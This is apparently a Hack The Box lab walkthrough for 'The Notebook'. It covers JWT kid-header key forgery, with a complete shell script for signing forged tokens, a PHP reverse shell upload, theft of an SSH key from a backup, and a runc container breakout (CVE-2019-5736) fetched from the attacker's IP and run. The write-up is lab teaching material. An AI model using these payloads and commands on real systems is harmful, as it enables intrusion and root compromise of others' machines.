NepCodeX



The Notebook Walkthrough – Hackthebox – Writeup


At the time of writing, this machine was still in the active list, so only proceed if you have tried it on your own first. Welcome to “The Notebook Walkthrough – Hackthebox – Writeup”.

Note: Publishing writeups for active machines is against the HTB rules; otherwise I would have protected this post with the root flag. I also couldn’t find a WordPress content locker that allows a custom message, so I couldn’t password-protect the post with another secret such as the root hash or the contents of a root-only readable file.


Scan open ports

As usual, I started by enumerating the open ports with nmap.

nmap -T4 -sC -sV -p- --min-rate=1000 -oN nmap.log 10.10.10.230
[screenshot: nmap scan results]

Of the services found, only the web server offered an obvious way in, so I focused further enumeration there.

Enumerate the webserver

Next, I opened the IP address in Firefox.

[screenshot: the web application’s landing page]

I also tried to discover additional paths on the server, but found nothing. So I fired up Burp Suite and registered an account. As soon as I registered, the response set a JWT.

[screenshot: Burp Suite response containing the JWT]

Next, I copied the token and pasted it into jwt.io to decode it.

[screenshot: the decoded JWT on jwt.io]

Reference: https://blog.pentesteracademy.com/hacking-jwt-tokens-kid-claim-misuse-key-leak-e7fce9a10a9c

The decoded header carries a kid (key identifier) field that tells the server where to load the verification key from, and the alg field suggests an RSA-signed token. If the server blindly fetches the key named by kid, I can host a private key I control, point kid at it, and the server will accept any token I sign with that key. So I generated a key and served it over HTTP on the port the kid URL referenced:

openssl genrsa -out privKey.key 2048
python3 -m http.server 7070
[screenshot: key generation and the HTTP server hosting it]
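To make the forgery concrete, here is an added example (it is not code from the original post) that does by hand what jwt.io plus a text editor does: it base64url-encodes a header whose kid points at the key we host, signs with our RSA private key using the same openssl tool the walkthrough uses, and includes a verifier so the result can be checked locally before sending it to the target. The kid URL, the attacker IP and the claim names in the payload are illustrative assumptions, not values taken from the box; the target’s real claim set is whatever the decoded token showed.

```shell
#!/bin/sh
# Added example for this writeup (not code from the original post): forge a
# JWT whose "kid" header names a key we host, and verify it locally.
# Assumes openssl is installed and that the target loads its verification key
# from the URL in "kid". The URL, attacker IP and claim names used here are
# illustrative assumptions.

# base64url without padding (RFC 7515 section 2)
b64url() {
  openssl base64 -A | tr '/+' '_-' | tr -d '='
}

# forge_jwt PRIVATE_KEY KID_URL PAYLOAD_JSON -> prints header.payload.signature
forge_jwt() {
  key=$1; kid=$2; payload=$3
  header=$(printf '{"typ":"JWT","alg":"RS256","kid":"%s"}' "$kid" | b64url)
  body=$(printf '%s' "$payload" | b64url)
  # RS256 = RSASSA-PKCS1-v1_5 over SHA-256 of "header.payload"
  sig=$(printf '%s.%s' "$header" "$body" \
        | openssl dgst -sha256 -sign "$key" -binary | b64url)
  printf '%s.%s.%s\n' "$header" "$body" "$sig"
}

# verify_jwt TOKEN PUBLIC_KEY_PEM -> exit 0 if the signature checks out.
# This mirrors what the server does once it has fetched the key we host.
verify_jwt() {
  token=$1; pub=$2
  signing_input=${token%.*}      # header.payload
  sig=${token##*.}               # signature part
  case $(( ${#sig} % 4 )) in     # restore base64 padding before decoding
    2) sig="${sig}==" ;;
    3) sig="${sig}=" ;;
  esac
  sigfile=$(mktemp)
  printf '%s' "$sig" | tr '_-' '/+' | openssl base64 -d -A > "$sigfile"
  printf '%s' "$signing_input" \
    | openssl dgst -sha256 -verify "$pub" -signature "$sigfile" >/dev/null 2>&1
  rc=$?
  rm -f "$sigfile"
  return $rc
}

# Usage (illustrative values):
#   openssl genrsa -out privKey.key 2048
#   openssl rsa -in privKey.key -pubout -out privKey.pub
#   forge_jwt privKey.key http://10.10.14.39:7070/privKey.key \
#     '{"username":"attacker","role":"admin"}'
#   verify_jwt "$token" privKey.pub && echo "signature OK"
```

The verifier here uses the public half of the key; the walkthrough serves the private key file itself because that is what the target expects to load. The server-side fix is the mirror image of the attack: treat kid as an opaque name looked up in a server-held key set, never as a path or URL to dereference.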

Then I copied the forged JWT, with its claims edited to grant admin rights, and set it as the session cookie using Firefox’s developer tools.

[screenshot: forged token set as the cookie in Firefox developer tools]

With the forged token I could read notes and upload files through the admin panel, so I looked at the notes.

[screenshots: notes visible in the admin panel]

Two notes matter. One says that uploaded PHP files get executed, which means an upload can give us a reverse shell. The other mentions regular backups, which points to a cron job and backup artifacts that may help with privilege escalation later.

So I copied the PHP reverse shell that ships with Kali and changed its IP and port to my machine’s.

cp /usr/share/webshells/php/php-reverse-shell.php shell.php
vi shell.php # change ip and port
nc -nlvp 4444 # the port that I am listening on

Next, I uploaded it through the admin panel.

[screenshot: uploading shell.php]

Clicking the “View” button executed the PHP file and my listener caught the reverse shell.

[screenshot: reverse shell received on the listener]

Finally, I had access to the machine.

Getting a user’s shell

Now that I had a reverse shell, I upgraded the dumb shell to an interactive one.

[screenshots: upgrading the shell]

Then I listed the users on the machine that have a login shell.

cat /etc/passwd | grep bash
[screenshot: /etc/passwd entries with a bash shell]

There is a user noah on the target. The note in the web app said that regular backups are being performed, so I looked at the backups directory.

cd /var/backups
ls -al
[screenshot: listing of /var/backups]

In that directory I found a home-directory backup, home.tar.gz. To pull it down, I served /var/backups over HTTP from the target (port 8000 is http.server’s default):

which python3
python3 -m http.server

On my local machine:

wget http://10.10.10.230:8000/home.tar.gz
tar -xzvf home.tar.gz
cd home/noah
ls -al
cd .ssh
ls -al
[screenshot: extracted backup showing noah’s .ssh directory]

Here we have noah’s SSH private key, which should let us log in as noah. If the extracted key ended up with permissive file modes, ssh will refuse to use it until you run chmod 600 id_rsa.

ssh noah@10.10.10.230 -i id_rsa
[screenshot: SSH login as noah]

That got me the user flag.

ls -al
cat user.txt
[screenshot: contents of user.txt]

Root privilege escalation

Finally, I had to escalate to root, so I checked noah’s sudo permissions.

sudo -l
[screenshot: sudo -l output]

noah can run docker exec against the webapp-dev01 container through sudo without a password, which gives a root shell inside that container.

docker --version
[screenshot: docker --version output]

The Docker version is 18.06.0-ce, and Docker releases before 18.09.2 ship a runc that is vulnerable to the container breakout CVE-2019-5736. So I first got a shell inside the container:

sudo docker exec -it webapp-dev01 bash
[screenshot: shell inside the webapp-dev01 container]

Now I had to get root on the host machine.

https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout#runc-exploit-cve-2019-5736

https://github.com/Frichetten/CVE-2019-5736-PoC/blob/master/main.go

I read up on the exploit and downloaded the PoC to my local machine, then changed its payload to suit my needs and served the compiled binary over HTTP:

wget https://raw.githubusercontent.com/Frichetten/CVE-2019-5736-PoC/master/main.go
vi main.go
go build main.go
python3 -m http.server
[screenshot: building the PoC and serving it]

The PoC’s payload variable holds a script that runs as root on the host once runc has been overwritten; I replaced it with a reverse shell that connects back to my machine on port 9999 and started a listener on that port.

Inside the container on the target:

wget http://10.10.14.39:8000/main && chmod +x main && ./main
[screenshot: running the PoC inside the container]

What the PoC does: it replaces the container’s /bin/sh with a script whose interpreter line is #!/proc/self/exe. When docker exec next launches /bin/sh, the program that actually runs is the host’s runc binary; the PoC grabs a handle to it through /proc and overwrites it with the payload, which then executes as root on the host the next time runc is invoked. So, as soon as the message “Overwritten /bin/sh successfully” appeared, and before anything else was printed, I triggered it from a second SSH session:

sudo docker exec -it webapp-dev01 /bin/sh
[screenshots: docker exec triggering the runc overwrite]

The listener on port 9999 received a root shell on the host.

[screenshot: root shell on the host]

Update

For those who are stuck at the privilege escalation step, I have recorded a demo as a GIF. Please check the following Dropbox link and leave a comment if it worked for you.

https://www.dropbox.com/s/z24z4e2wbwbt7n0/the%20notebook.gif?dl=0


